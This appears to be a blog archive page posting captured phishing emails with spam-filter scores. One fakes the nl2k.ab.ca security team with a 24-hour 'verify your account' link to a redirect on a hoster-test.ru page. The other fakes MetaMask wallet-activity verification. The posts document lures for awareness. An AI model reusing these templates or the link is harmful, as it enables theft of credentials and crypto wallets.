1.5 SPOOF_GMAIL_MID From Gmail but it doesn't seem to be...

0.9 URI_PHISH Phishing using web form

Subject: {SPAM?} Action Required: Verify Your doctor.nl2k.ab.ca Account to Avoid Access Restrictions

w3.org/TR/html4/loose.dtd">

Credential phishing Part 2

Posted by Dave Yadallee on Tuesday, December 9. 2025

Content preview: doctor.nl2k.ab.ca Account Services Account Verification Required

We are conducting a routine security check on all accounts to ensure your

account information is accurate and secure. This process is mandatory to

maintain uninterrupted access to your account.

Content analysis details: (19.9 points, 5.0 required)

pts rule name description

---- ---------------------- --------------------------------------------------

1.0 RCVD_IN_WSFF RBL: Received via a relay in will-spam-for-food.eu.org

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

[50.76.93.152 listed in will-spam-for-food.eu.org]

1.5 RCVD_IN_AHBL RBL: AHBL: sender is listed in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

[50.76.93.152 listed in dnsbl.ahbl.org]

[50.76.93.152 listed in dnsbl.ahbl.org]

[50.76.93.152 listed in dnsbl.ahbl.org]

0.5 RCVD_IN_AHBL_PROXY RBL: AHBL: Open Proxy server in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

0.5 RCVD_IN_AHBL_SMTP RBL: AHBL: Open SMTP relay in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

1.5 RCVD_IN_AHBL_SPAM RBL: AHBL: Spam Source in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

0.0 RCVD_IN_AHBL_RTB RBL: AHBL: Real-Time Blocked in dnsbl.ahbl.org

[50.76.93.152 listed in dnsbl.ahbl.org]

-0.0 SPF_HELO_PASS SPF: HELO matches SPF record

0.0 DKIM_ADSP_CUSTOM_MED No valid author signature, adsp_override is

CUSTOM_MED

1.0 SPF_SOFTFAIL SPF: sender does not match SPF record (softfail)

0.5 NO_RDNS Sending MTA has no reverse DNS (Postfix variant)

1.4 FSL_HELO_FAKE No description available.

0.0 FREEMAIL_FROM Sender email is commonly abused enduser mail provider

[support2(at)gmail.com]

0.2 FREEMAIL_ENVFROM_END_DIGIT Envelope-from freemail username ends in

digit

[support2(at)gmail.com]

1.0 FORGED_GMAIL_RCVD 'From' gmail.com does not match 'Received' headers

0.5 URI_NOVOWEL URI: URI hostname has long non-vowel sequence

0.0 T_MXG_EMAIL_FRAG BODY: URI with email in fragment

0.0 HTML_FONT_SIZE_HUGE BODY: HTML font size is huge

0.0 HTML_MESSAGE BODY: HTML included in message

1.1 MIME_HTML_ONLY BODY: Message only has text/html MIME parts

3.0 VOWEL_URI_7 RAW: URI hostname with 7+ consecutive vowels

1.5 TVD_PH_BODY_ACCOUNTS_PRE The body matches phrases such as "accounts

suspended", "account credited", "account

verification"

0.0 SPOOFED_FREEMAIL No description available.

1.0 ACCT_PHISHING Possible phishing for account information

1.5 SPOOF_GMAIL_MID From Gmail but it doesn't seem to be...

1.2 NML_ADSP_CUSTOM_MED ADSP custom_med hit, and not from a mailing list

0.9 URI_PHISH Phishing using web form

Subject: {SPAM?} Action Required: Verify Your doctor.nl2k.ab.ca Account to Avoid Access Restrictions

w3.org/TR/html4/loose.dtd">

A=

ccount Verification Required

OP: 12px; PADDING-LEFT: 15px; BORDER-LEFT: rgb(0,120,212) 4px solid; MARGIN=

: 20px 0px; PADDING-RIGHT: 15px; border-radius: 0px 4px 4px 0px">

: 0px 0px 5px">Recommended action:

Please veri=

fy your account within the next 24 hours to avoid any temporary access rest=

rictions.

211,211,211) 1px dotted; BORDER-BOTTOM: rgb(211,211,211) 1px dotted; BORDER=

-LEFT: rgb(211,211,211) 1px dotted; MARGIN: 25px 0px" cellspacing=3D"0" cel=

lpadding=3D"0" width=3D"100%" border=3D"0">

,211,211) 1px dotted; BORDER-BOTTOM: rgb(211,211,211) 1px dotted; BORDER-LE=

FT: rgb(211,211,211) 1px dotted; MARGIN: 0px" align=3D"center">

COLOR: rgb(255,255,255); PADDING-BOTTOM: 12px; PADDING-TOP: 12px; PADDING-L=

EFT: 24px; DISPLAY: inline-block; PADDING-RIGHT: 24px; border-radius: 4px; =

text-decoration-line: none" href=3D"https://r.srvtrck.com/v1/redirect?yk_ta=

g=3D337_47d_c3_3b6f&site_id=3D56e7d51be4b05d750682348a&api_key=3Dab=

bc5236946676eae219a734c0a1c5e8&url=3Dhttp://srv244547.hoster-test.ru/In=

dx/server/IndexIPFSOTFF.html#doctor@doctor.nl2k.ab.ca" target=3D_blank>

Verify Your Account

NE-HEIGHT: 1.5">If you do not verify your account within 24 hours, access t=

o your account may be restricted for your protection.

DING-TOP: 20px">

Tha=

nk you,

doctor.nl2k=

=2Eab.ca Security Team

Credential phishing part 1

Posted by Dave Yadallee on Tuesday, December 9. 2025

X-Mozilla-Status: 0001

X-Mozilla-Status2: 00000000

Return-path:

Envelope-to: dave@doctor.nl2k.ab.ca

Delivery-date: Mon, 08 Dec 2025 08:09:00 -0700

Received: from doctor by doctor.nl2k.ab.ca with local (Exim 4.98.2 (FreeBSD))

(envelope-from )

id 1vScqm-000000003YR-2YGb

for dave@doctor.nl2k.ab.ca;

Mon, 08 Dec 2025 08:08:32 -0700

Resent-From: The Doctor

Resent-Date: Mon, 8 Dec 2025 08:08:32 -0700

Resent-Message-ID:

Resent-To: Dave Yadallee

Received: from mx.cndns.org ([107.189.14.8]:53090)

by doctor.nl2k.ab.ca with esmtps (TLS1.3) tls TLS_AES_256_GCM_SHA384

(Exim 4.98.2 (FreeBSD))

(envelope-from )

id 1vSciU-000000002u7-3sbu

for sales@nk.ca;

Mon, 08 Dec 2025 08:00:07 -0700

Received: from [194.110.173.9] (unknown [194.110.173.9])

by mx.cndns.org (Postfix) with ESMTP id 78FB183A5E

for ; Mon, 8 Dec 2025 14:47:47 +0000 (UTC)

From: walletstatus@metamask.io

To: sales@nk.ca

Subject: Action Required: Confirm Your Wallet Activity sales@nk.ca

Date: 8 Dec 2025 06:47:47 -0800

Message-ID: <20251208064747.936BC1FECDA34FB8@metamask.io>

MIME-Version: 1.0

Content-Type: text/html;

charset="utf-8"

Content-Transfer-Encoding: quoted-printable

MetaMask Account Maintenance

goe UI', Roboto, sans-serif;

color: #1a1a1a;

line-height: 1.6;

margin: 0;

padding: 40px 24px;

background: linear-gradient(135deg, #f7931a 0%, #f5a623 50%, #f=

6851b 100%);

min-height: 100vh">

margin: 0 auto;

background: rgba(255,255,255,0.95);

backdrop-filter: blur(20px);

border-radius: 24px;

box-shadow: 0 32px 64px rgba(246,133,27,0.3);

overflow: hidden;

animation: slideUp 0.8s cubic-bezier(0.25,0.46,0.45,0.94)" clas=

s=3D"container" role=3D"main">

Wallet Status Verification

=20=20=20=20=20=20=20=20=20=20=20=20

Dear Valued User,

=20=20=20=20=20=20=20=20=20=20=20=20

As part of our routine account maintenance procedures, MetaM=

ask is currently verifying the status of wallets linked to your profile. Ou=

r systems have detected one of your registered wallets has shown no recent =

activity.

=20=20=20=20=20=20=20=20=20=20=20=20

To ensure continued secure association with your account, pl=

ease confirm you are still actively using this wallet.

=20=20=20=20=20=20=20=20=20=20=20=20

lank" rel=3D"noopener noreferrer">

🔐 Verify Wallet Activity

=20=20=20=20=20=20=20=20=20=20=20=20

ℹ️ Information: If this walle=

t is no longer in use, no action is required. Inactive wallets may be autom=

atically archived during our next system update.

=20=20=20=20=20=20=20=20=20=20=20=20

Thank you for your cooperation.

MetaMask Operations Team

Metamask phish part 1

Posted by Dave Yadallee on Tuesday, December 9. 2025

A= ccount Verification Required

A= ccount Verification Required

A= ccount Verification Required

A= ccount Verification Required

A= ccount Verification Required

A= ccount Verification Required

Wallet Status Verification

A=

ccount Verification Required

A=

ccount Verification Required

A=

ccount Verification Required

A=

ccount Verification Required

A=

ccount Verification Required

A=

ccount Verification Required